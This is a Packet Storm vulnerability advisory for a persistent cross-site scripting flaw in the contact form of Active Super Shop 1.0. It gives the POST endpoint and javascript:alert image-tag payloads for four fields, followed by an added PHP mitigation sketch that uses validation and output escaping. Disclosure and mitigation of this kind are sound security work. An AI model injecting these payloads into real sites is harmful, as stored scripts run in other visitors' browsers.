Active Super Shop 1.0 Cross Site Scripting

2015-07-19T00:00:00
ID PACKETSTORM:132749
Type packetstorm
Reporter Angelo Ruwantha
Modified 2015-07-19T00:00:00

Description

                                        
`# Exploit Title: Active Super Shop Persistent XSS  
# Date: Fri July 17 2015  
# Exploit Author: Angelo Ruwantha  
# Vendor Homepage: http://activeitzone.com/  
# Version: 1.0  
# Tested on: archlinux  
  
Vulnerability (persistent XSS)  
========================  
The contact form fields are vulnerable to persistent XSS.  
[+] Method: POST  
  
1. http://URL/index.php/home/contact/ (persistent XSS)  
  
name=<IMG SRC="javascript:alert('HEY;)');  
&email=<IMG SRC="javascript:alert('another script;)');  
&subject=<IMG SRC="javascript:alert('every parameter;)');  
&message=<IMG SRC="javascript:alert('injectable;)');  
  
`
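
A mitigation sketch for the four contact-form fields listed above, added here as an example and not taken from Active Super Shop or the advisory author. The function names, length limits and table markup are assumptions. It shows that input validation rejects only the `email` payload, while escaping at output time neutralises all four.

```php
<?php
// Escape a stored value for an HTML text or quoted-attribute context.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate the four POST fields named in the advisory (needs ext-mbstring).
// Returns [clean, errors]; the length limits are assumed values.
function validate_contact(array $post): array
{
    $limits = ['name' => 100, 'email' => 254, 'subject' => 150, 'message' => 5000];
    $clean = $errors = [];
    foreach ($limits as $field => $max) {
        $raw = $post[$field] ?? '';
        if (!is_string($raw) || !mb_check_encoding($raw, 'UTF-8')) {
            $errors[$field] = 'not valid UTF-8 text';
            continue;
        }
        // Strip control characters except tab, LF and CR.
        $value = trim(preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $raw));
        if ($value === '' || mb_strlen($value, 'UTF-8') > $max) {
            $errors[$field] = 'empty or too long';
        } elseif ($field === 'email' && filter_var($value, FILTER_VALIDATE_EMAIL) === false) {
            $errors[$field] = 'not an e-mail address';
        } else {
            $clean[$field] = $value;
        }
    }
    return [$clean, $errors];
}

// Render one stored message with every field escaped at output time.
function render_message(array $row): string
{
    return sprintf(
        "<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>\n",
        e($row['name']), e($row['email']), e($row['subject']), nl2br(e($row['message']))
    );
}

// Constructed input: the first field value from the advisory, reused for all fields.
$payload = '<IMG SRC="javascript:alert(\'HEY;)\');';
$post = ['name' => $payload, 'email' => $payload, 'subject' => $payload, 'message' => $payload];
[$clean, $errors] = validate_contact($post);
print_r($errors);           // only the email field is rejected by validation
echo render_message($post); // all four values are emitted as inert text
```

Escaping in the view also covers rows that were stored before any validation was in place.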